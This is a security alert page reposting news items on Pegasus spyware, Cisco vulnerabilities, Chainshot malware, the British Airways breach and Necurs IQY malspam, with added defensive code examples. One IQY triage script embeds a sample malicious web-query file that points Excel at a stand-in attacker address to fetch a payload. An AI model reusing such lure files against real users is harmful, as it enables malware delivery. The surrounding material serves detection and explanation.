Alerts

One of the world’s most dangerous Android and iPhone spyware programs has been found deployed against targets in 45 countries over the last two years, a new report from Citizen Lab reveals.

The infamous spyware, dubbed Pegasus, is developed by NSO Group, an Israeli company best known for selling high-end surveillance tools, capable of remotely compromising iPhones and Android devices, to intelligence agencies around the world.

Pegasus is NSO Group’s most powerful product. It is designed to compromise iPhone, Android and other mobile devices remotely, giving the operator access to an enormous amount of data on the target, including text messages, calendar entries, emails, WhatsApp messages, location, microphone and camera, all without the victim’s knowledge.

Pegasus has previously been used to target human rights activists and journalists, from Mexico to the United Arab Emirates.

Just last month, The Hacker News reported that this spyware had been used earlier this year against a staffer of Amnesty International, one of the most prominent non-profit human rights organizations in the world, as well as against another human rights defender.

 

Now, a new report released Tuesday from the University of Toronto’s Citizen Lab revealed that the Pegasus infections have victimized more countries than previously believed.

36 Pegasus Spyware Operations Found Deployed in 45 Countries

Citizen Lab said last month that it had so far counted as many as 174 publicly reported cases of individuals worldwide “abusively targeted” with NSO spyware; it has now found traces of Pegasus infections in as many as 45 countries.

According to the report, 36 Pegasus operators have been using the spyware to conduct surveillance operations in 45 countries worldwide, and at least 10 of these operators appear to be actively engaged in cross-border surveillance.

The report further said that while some NSO customers may be lawfully using Pegasus, at least 6 of those countries with significant Pegasus operations were “known spyware abusers,” which means they have previously been linked to the abusive use of spyware to target civil society.

 

These “known spyware abusers” include Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia, and the United Arab Emirates.

The list of countries targeted by Pegasus includes Algeria, Bahrain, Bangladesh, Brazil, Canada, Cote d’Ivoire, Egypt, France, Greece, India, Iraq, Israel, Jordan, Kazakhstan, Kenya, Kuwait, Kyrgyzstan, Latvia, Lebanon, Libya, Mexico, Morocco, the Netherlands, Oman, Pakistan, Palestine, Poland, Qatar, Rwanda, Saudi Arabia, Singapore, South Africa, Switzerland, Tajikistan, Thailand, Togo, Tunisia, Turkey, the UAE, Uganda, the United Kingdom, the United States, Uzbekistan, Yemen, and Zambia.

Because Citizen Lab located Pegasus infections by fingerprinting Pegasus infrastructure and identifying the IP addresses associated with the same spyware system, it acknowledged that its country attributions may contain some inaccuracies, since some targets may have been using VPN or satellite connections.

Citizen Lab is keeping those fingerprints secret for now, but said that servers matching them could be found by scanning the internet.

Spyware Creator “NSO Group” Response:

In response to the Citizen Lab report, an NSO Group spokesperson released a statement saying that the company operates in full compliance with applicable law in every country it deals with, including export control regulations.

“Contrary to statements made by you, our product is licensed to government and law enforcement agencies for the sole purpose of investigating and preventing crime and terror. Our business is conducted in strict compliance with applicable export control laws,” NSO Group spokesperson Shalev Hulio told Citizen Lab.

“NSO’s Business Ethics Committee, which includes outside experts from various disciplines, including law and foreign relations, reviews and approves each transaction and is authorized to reject agreements or cancel existing agreements where there is a case of improper use.”

NSO Group further said that there were problems with the Citizen Lab research and that the company does not sell in many of the 45 countries listed in the report.

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Cisco today released thirty security advisories addressing a total of 32 vulnerabilities in its products, three of which are rated critical, including the recently disclosed Apache Struts remote code execution vulnerability that is being exploited in the wild.

Of the remaining 29 vulnerabilities, 14 are rated high and 15 medium severity. They affect Cisco routers, Cisco Webex, Cisco Umbrella, the Cisco SD-WAN Solution, the Cisco Cloud Services Platform, Cisco Data Center Network and other products.

The three critical vulnerabilities address issues in Apache Struts, the Cisco Umbrella API, and the management interface of the Cisco RV110W, RV130W and RV215W routers.

Apache Struts Remote Code Execution Vulnerability (CVE-2018-11776)

The vulnerability, reported late last month by Semmle security researcher Man Yue Mo, resides in the core of the Struts framework and stems from insufficient validation of untrusted user-supplied input under certain configurations.

“The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action,” Cisco explains in its advisory.

“In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing.”

An unauthenticated, remote attacker can trigger the vulnerability by sending a specially crafted URL to the affected web server; no user interaction is needed. Successful exploitation allows the attacker to execute arbitrary code and ultimately take complete control of the server running the vulnerable application.

All applications that use Apache Struts, both the supported versions (Struts 2.3 through 2.3.34 and Struts 2.5 through 2.5.16) and some unsupported versions, are potentially vulnerable to this flaw, even when no additional plugins are enabled.

Apache patched the vulnerability last month with the release of Struts 2.3.35 and 2.5.17. Cisco has now also released fixes for several of its own products; the affected Cisco products are listed in Cisco’s advisory.

Since there is no workaround for this issue, organizations and developers are strongly advised to update their Struts components as soon as possible.
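As a concrete check for the configuration pattern described above, here is an added example (mine, not code from Cisco, Apache or The Hacker News) that audits a struts.xml for packages without a namespace or with a wildcard namespace, and for redirectAction/chain results that carry no namespace parameter. It also checks the struts.mapper.alwaysSelectFullNamespace constant, which the Apache S2-057 advisory names as a precondition but which this page does not mention. The two embedded struts.xml documents are constructed samples and the class names in them are placeholders. It is a triage aid only: the fix remains upgrading Struts.

```python
"""Audit a struts.xml for the configuration pattern behind S2-057 (CVE-2018-11776)."""
import xml.etree.ElementTree as ET
from typing import List

# Constructed sample: the risky combination (flag set, packages without a real namespace,
# a redirectAction result that never says which namespace it targets).
VULNERABLE_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="index" class="com.example.IndexAction">
      <result type="redirectAction">
        <param name="actionName">dashboard</param>
      </result>
    </action>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="help" class="com.example.HelpAction"/>
  </package>
</struts>
"""

# Constructed sample: the same application with the flag off and explicit namespaces everywhere.
HARDENED_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false"/>
  <package name="default" namespace="/app" extends="struts-default">
    <action name="index" class="com.example.IndexAction">
      <result type="redirectAction">
        <param name="actionName">dashboard</param>
        <param name="namespace">/app</param>
      </result>
    </action>
  </package>
</struts>
"""

FLAG = "struts.mapper.alwaysSelectFullNamespace"


def audit_struts_config(xml_text: str) -> List[str]:
    """Return one finding per risky element; an empty list means nothing matched."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []

    # Precondition taken from the Apache S2-057 advisory (not stated on this page): with this
    # constant true, the action mapper takes the namespace from the request URL whenever the
    # package does not pin one, which is how attacker-supplied input reaches the result.
    if any(c.get("name") == FLAG and (c.get("value") or "").strip().lower() == "true"
           for c in root.iter("constant")):
        findings.append(f"{FLAG}=true")

    # Packages with no namespace or a wildcard namespace: the advisory's
    # "no namespace or a wildcard namespace" case.
    for pkg in root.iter("package"):
        ns = pkg.get("namespace", "")
        if ns == "" or "*" in ns:
            findings.append(f"package {pkg.get('name')!r} has no or wildcard namespace ({ns!r})")

    # redirectAction / chain results that do not name their target namespace:
    # the advisory's "results with no namespace value" case.
    for action in root.iter("action"):
        for result in action.findall("result"):
            if result.get("type") in ("redirectAction", "chain"):
                params = {p.get("name"): (p.text or "").strip() for p in result.findall("param")}
                if not params.get("namespace"):
                    findings.append(f"action {action.get('name')!r} has a {result.get('type')} "
                                    "result without a namespace param")
    return findings


def is_exposed(xml_text: str) -> bool:
    """Exposure needs the flag plus at least one namespace-less package or result."""
    findings = audit_struts_config(xml_text)
    return f"{FLAG}=true" in findings and len(findings) > 1


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_STRUTS_XML), ("hardened", HARDENED_STRUTS_XML)):
        print(label, "exposed" if is_exposed(doc) else "ok")
        for finding in audit_struts_config(doc):
            print("  -", finding)
```

Point the script at a real struts.xml by reading the file into `audit_struts_config`; a non-empty result on a Struts version older than 2.3.35 or 2.5.17 means the upgrade should not wait. JSP pages using `<s:url>` tags without a value or action, the other case Cisco's advisory mentions, are outside what this struts.xml check can see.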

Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435)

The second critical vulnerability resides in the Cisco Umbrella API and could allow an authenticated, remote attacker to view and modify data belonging not only to their own organization but to other organizations as well.

Cisco Umbrella is a cloud security platform that provides the first line of defense against threats over all ports and protocols by blocking access to malicious domains, URLs, IPs, and files before a connection is ever established or a file is downloaded.

The vulnerability stems from insufficient authentication configuration on the Cisco Umbrella API interface; successful exploitation could allow an attacker to read or modify data across multiple organizations.

Cisco has addressed the vulnerability in the Cisco Umbrella production APIs. Because Umbrella is a cloud service, no user action is required.

Cisco Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423)

The third critical vulnerability resides in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router and Cisco RV215W Wireless-N VPN Router, and could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial-of-service (DoS) condition.

The flaw is caused by improper boundary checks on user-supplied input in the Guest user feature of the web-based management interface. An attacker can exploit it by sending malicious requests to a targeted device, triggering a buffer overflow.

“A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code,” the company explains.

This vulnerability affects all releases of Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router.

Cisco has addressed this vulnerability in firmware release 1.0.3.44 for the Cisco RV130W Wireless-N Multifunction VPN Router, but will not release firmware updates for the Cisco RV110W Wireless-N VPN Firewall and Cisco RV215W Wireless-N VPN Router. According to the company’s Product Security Incident Response Team (PSIRT), the Apache Struts flaw is being exploited in the wild, while the team is not aware of any exploits for the other two critical flaws.

The Bottom Line: Patch! Patch! Patch!

 

The information is gathered from The Hacker News.

Security researchers exploited a threat actor’s poor choice for encryption and discovered a new piece of malware along with network infrastructure that links to various targeted attacks.

The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.

Researchers from Palo Alto Networks Unit 42 found Chainshot after following the trail of an Adobe Flash zero-day exploit (CVE-2018-5002) used in a series of targeted malware campaigns.

Cracking the encryption

By studying network captures of traffic exchanged with the attacker’s command and control (C2) servers, Unit 42 malware analysts noticed that the key protecting the malware payload had been wrapped with a 512-bit RSA key. RSA (Rivest–Shamir–Adleman) is an asymmetric cryptosystem: the public key encrypts data and the corresponding private key is required to decrypt it.

Cracking a 512-bit key has been possible since 1999, when factoring such a modulus required around 300 computers working for seven months. Today, all that is needed is money to rent cloud computing power and a few hours of waiting.

In a technical report today, the researchers explain how they were able to crack the private key that decrypted Chainshot.

“While the private key remains only in memory, the public keys’ modulus n is sent to the attacker’s server. On the server side, the modulus is used together with the hardcoded exponent e 0x10001 to encrypt the 128-bit AES key which was used previously to encrypt the exploit and shellcode payload,” they write.

Using Factoring as a Service (FaaS), the researchers were able to factor the modulus, calculate the decryption key and access the Chainshot malware.
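To make the key-recovery path concrete, the following added example (mine, not Unit 42’s code) walks through the scheme quoted above in toy size: a client RSA modulus n with the hard-coded exponent 0x10001, an AES key wrapped under that public key, and an analyst who sees only n, e and the ciphertext and factors n with Pollard’s rho to derive the private exponent. Two assumptions keep it runnable offline: the modulus is built from two well-known 30-bit primes rather than a 512-bit key (so a laptop factors it in well under a second, where the real case needed rented compute), and because that modulus is smaller than 128 bits the key is wrapped in 32-bit chunks rather than in one RSA operation. The AES decryption of the payload itself is not repeated here.

```python
"""Recover an RSA-wrapped AES key from a factorable modulus: a toy-sized version of the Chainshot case."""
import math
import random
from typing import List

E = 0x10001          # hard-coded public exponent, as in the Chainshot C2 exchange
CHUNK_BYTES = 4      # demo only: the toy modulus is far smaller than 128 bits, so wrap the key in pieces

# Constructed toy key pair from two well-known primes (about a 60-bit modulus). Chainshot used
# 512 bits, which is out of reach for this loop but not for rented compute, as the article explains.
_P, _Q = 1000000007, 998244353
MODULUS = _P * _Q


def pollard_rho(n: int, rng: random.Random) -> int:
    """Return a non-trivial factor of the composite n (Pollard's rho with Floyd cycle detection)."""
    if n % 2 == 0:
        return 2
    while True:
        c = rng.randrange(1, n)
        x = y = rng.randrange(2, n)
        d = 1
        while d == 1:
            x = (x * x + c) % n          # tortoise: one step of x -> x^2 + c mod n
            y = (y * y + c) % n          # hare: two steps
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:                       # d == n means this walk failed; retry with another c
            return d


def private_exponent(n: int, p: int, e: int = E) -> int:
    """d = e^-1 mod phi(n), computable as soon as one factor p of n is known."""
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def wrap_key(aes_key: bytes, n: int, e: int = E) -> List[int]:
    """Server side: encrypt the AES key under the client's public key (n, e).
    Demo simplification: CHUNK_BYTES-sized integers, each below n, instead of one 512-bit block."""
    chunks = [int.from_bytes(aes_key[i:i + CHUNK_BYTES], "big")
              for i in range(0, len(aes_key), CHUNK_BYTES)]
    return [pow(m, e, n) for m in chunks]


def unwrap_key(wrapped: List[int], n: int, d: int) -> bytes:
    """Client side (or an analyst holding the recovered d): decrypt the chunks and reassemble."""
    return b"".join(pow(c, d, n).to_bytes(CHUNK_BYTES, "big") for c in wrapped)


def recover_aes_key(wrapped: List[int], n: int, e: int = E, seed: int = 1) -> bytes:
    """Analyst path: only n, e and the ciphertext are needed, which is exactly what a packet
    capture of the C2 exchange provides. Factor n, derive d, unwrap."""
    p = pollard_rho(n, random.Random(seed))
    return unwrap_key(wrapped, n, private_exponent(n, p, e))


if __name__ == "__main__":
    key = bytes(range(16))                    # constructed 128-bit "AES key" stand-in
    wrapped = wrap_key(key, MODULUS)          # what the server would send back to the implant
    print("recovered:", recover_aes_key(wrapped, MODULUS).hex())
```

The design point the example makes is the one Unit 42 exploited: the private key never leaves the victim’s memory, but the whole security of the exchange rests on the size of n, and a 512-bit n is a factoring budget, not a secret. Swap the toy primes for a real 512-bit modulus and the only line that changes is the factoring step, which moves from Pollard’s rho to a number field sieve run on rented hardware.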

Chainshot is multipurpose

Apart from being part of a chain reaction that makes it difficult to analyze components individually, Chainshot contains code designed to search for and bypass Kaspersky and Bitdefender antivirus solutions for both x86 and x64 platforms.

Palo Alto told BleepingComputer that the attack occurred in May, and that they could not verify at the time of the analysis whether the bypass code worked against Kaspersky and Bitdefender. Bitdefender confirmed to us that its users have been protected against Chainshot since July. Kaspersky’s Artem Baranov said that he would test the exploit against the Automatic Exploit Prevention component.

Chainshot’s task is to push another piece of malware onto the compromised machine, which in turn drops the final payload. The dropper is also responsible for fingerprinting the system, sending back details about the user and the processes running on the machine. Because the adversary made the mistake of using weak encryption and reusing an SSL certificate across other attacks, security researchers were able to correlate the campaign with other incidents and paint a clearer picture of the entire operation.

 

The information is gathered from Bleeping Computer.

British Airways, which describes itself as “The World’s Favorite Airline,” has confirmed a data breach that exposed the personal details and payment card numbers of up to 380,000 customers and lasted for more than two weeks.

In a statement released on Thursday, British Airways said that customers who booked flights on its website (ba.com) and mobile app between late on 21 August and 5 September were affected. The airline advised customers who made bookings during that 15-day period and believe they may have been affected to “contact their banks or credit card providers and follow their recommended advice.”

British Airways stated on its Twitter account that personal details stolen in the breach included their customers’ names and addresses, along with their financial information, but the company assured its customers that the hackers did not get away with their passport numbers or travel details.

The company also said that cards saved on its website and mobile app were not compromised in the breach; only cards used to pay for bookings during the affected period were stolen.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app,” the company said in a statement. “The stolen data did not include travel or passport details.”

Although the statement released by the airline did not give the number of affected customers, a company spokesperson confirmed to the media that some 380,000 payment cards were compromised. It is also not yet clear how the breach occurred, but some media outlets report that it was identified when “a third party noticed some unusual activity” and informed the company.

A British Airways spokesperson confirmed to The Hacker News that “this is data theft, rather than a breach,” which suggests that someone with privileged access to the data might have stolen it.

British Airways has also informed the police and the Information Commissioner and is currently contacting affected customers directly. The company said that the security issue has now been resolved, that its website is working normally, and that it is safe for passengers to check in and book flights online.

The National Crime Agency is aware of the British Airways data breach and is “working with partners to assess the best course of action.”

Air Canada also suffered a severe data breach late last month which, along with personal data, exposed the passport numbers and other passport and travel details of about 20,000 mobile app customers.

 

The information is gathered from The Hacker News.

The Necurs botnet distributed over 780,000 emails in five campaigns earlier this year, all carrying weaponized IQY files, the latest method for delivering malware. The volume is quite low for a botnet responsible for 60% of the world’s spam traffic in the last quarter of 2017.

 

However, the use of weaponized IQY files is a rising trend in malspam campaigns; Necurs was first seen distributing malware with this file type on March 25.

IQY files are essentially text documents containing a web location from which Excel imports data into a spreadsheet. They are common in enterprise networks, where employees use them for collaboration. The files are not a threat in themselves, but the content retrieved from the external source can carry malicious code.

Microsoft Office does not run an IQY file’s data connection automatically; it prompts the user for permission first. A well-crafted email, however, can trick the user into enabling the data connection.
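The following added example (mine, not code from IBM X-Force or Bleeping Computer) shows how a mail gateway or an analyst script can triage .iqy attachments along the lines described above: parse the file, pull out the URL that Excel would fetch once the user clicks Enable, and block anything that is not an allowlisted internal data source. It assumes the usual .iqy layout (a WEB line, a version line, the URL, then optional Key=Value options); the two sample files and the allowlist are constructed.

```python
"""Triage Excel web query (.iqy) attachments: extract the fetch URL and decide allow/warn/block."""
from typing import Dict, Iterable, Tuple
from urllib.parse import urlsplit

# Assumed .iqy layout: "WEB", a version line, the URL Excel will fetch, then optional Key=Value
# options. Both files below are constructed samples: the first mimics the internal collaboration
# use, the second a malspam lure pointing Excel at an attacker-controlled host (a TEST-NET address).
BENIGN_IQY = (
    "WEB\r\n1\r\nhttps://reports.corp.example/sales.aspx\r\n\r\n"
    "Selection=EntirePage\r\nFormatting=None\r\n"
)
MALICIOUS_IQY = (
    "WEB\r\n1\r\nhttp://203.0.113.45/invoice/2.dat\r\n\r\n"
    "Selection=EntirePage\r\n"
)
ALLOWED_HOSTS = {"reports.corp.example"}   # assumption: the organisation's own data sources


def parse_iqy(text: str) -> Dict[str, str]:
    """Split an .iqy file into its fields; raises ValueError if it is not a web query."""
    lines = [ln.strip() for ln in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a web query file")
    fields = {"type": lines[0], "version": lines[1], "url": lines[2]}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def classify_iqy(text: str, allowed_hosts: Iterable[str] = ALLOWED_HOSTS) -> Tuple[str, str]:
    """Return (verdict, reason). The URL is the whole attack surface: whatever it serves is
    what Excel pulls into the sheet after the user enables the data connection."""
    try:
        fields = parse_iqy(text)
    except ValueError as exc:
        return "block", str(exc)                 # malformed files go to a human, not to Excel
    parts = urlsplit(fields["url"])
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        return "block", f"unexpected scheme {parts.scheme!r}"
    if host not in {h.lower() for h in allowed_hosts}:
        return "block", f"external data connection to {host or '<no host>'}"
    if parts.scheme != "https":
        return "warn", "allowlisted host reached over plain http"
    return "allow", f"allowlisted source {host}"


if __name__ == "__main__":
    for name, sample in (("benign.iqy", BENIGN_IQY), ("invoice.iqy", MALICIOUS_IQY)):
        verdict, reason = classify_iqy(sample)
        print(f"{name}: {verdict} ({reason})")
```

The allowlist is the policy lever: an organisation that genuinely uses IQY files for collaboration keeps its reporting hosts in `ALLOWED_HOSTS` and still blocks the unpaid-invoice lure, because the lure has to point at a host the attacker controls.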

Emails sent over a period of a month and a half

IBM X-Force caught the 780,000 emails that Necurs operators laced with weaponized IQY files between late May and mid-July.

As the researchers observed, the Necurs spam factory sent out over 300,000 messages on May 25. The second campaign, on June 7, delivered about 200,000 emails.

The numbers fell in the following bursts, with over 150,000 emails distributed on June 13 and fewer than 100,000 on July 13. The last burst, recorded on July 17, was the weakest, distributing fewer than 50,000 messages.

 

Some of the emails purported to be unpaid invoices, a common pretext that lures the victim into accessing the URL inside the IQY file. When the connection was approved, the embedded URL provided a remote access tool called FlawedAmmyy RAT, whose source code was leaked in March.

Other malware delivered by Necurs includes Marap and Quant Loader, two downloaders that can funnel in various types of threats. Cybercriminals are constantly looking to change their game by using file types that are typically overlooked as a potential threat.

“To ensure that their malicious emails reach recipients and do not end up blocked by email filters, cybercrime groups shuffle their tactics all the time, delivering booby-trapped files in many shapes throughout the year,” X-Force researchers note.

 

The information is gathered from Bleeping Computer.